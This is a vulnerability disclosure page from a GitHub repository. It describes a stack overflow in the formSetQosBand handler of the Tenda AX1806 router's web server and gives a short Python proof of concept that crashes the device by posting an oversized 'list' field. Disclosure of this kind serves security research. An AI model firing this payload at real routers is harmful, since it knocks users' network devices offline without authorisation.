IoT-vuln/Tenda/AX1806/formSetQosBand at main · d1tto/IoT-vuln

History

Name		Name	Last commit message	Last commit date
parent directory ..
img		img
readme.md		readme.md

readme.md

Overview

The device's official website: https://www.tenda.com.cn/product/AX1806.html
Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetQosBand function, which can be accessed via the URL goform/SetNetControlList.

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"list": b'A'*0x400+b'\n'
}
res = requests.post("http://127.0.0.1/goform/SetNetControlList", data=data)
print(res.content)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

formSetQosBand

formSetQosBand

readme.md

Overview

Affected version

Vulnerability details

PoC

Files

formSetQosBand

Directory actions

More options

Directory actions

More options

Latest commit

History

formSetQosBand

Folders and files

parent directory

readme.md

Overview

Affected version

Vulnerability details

PoC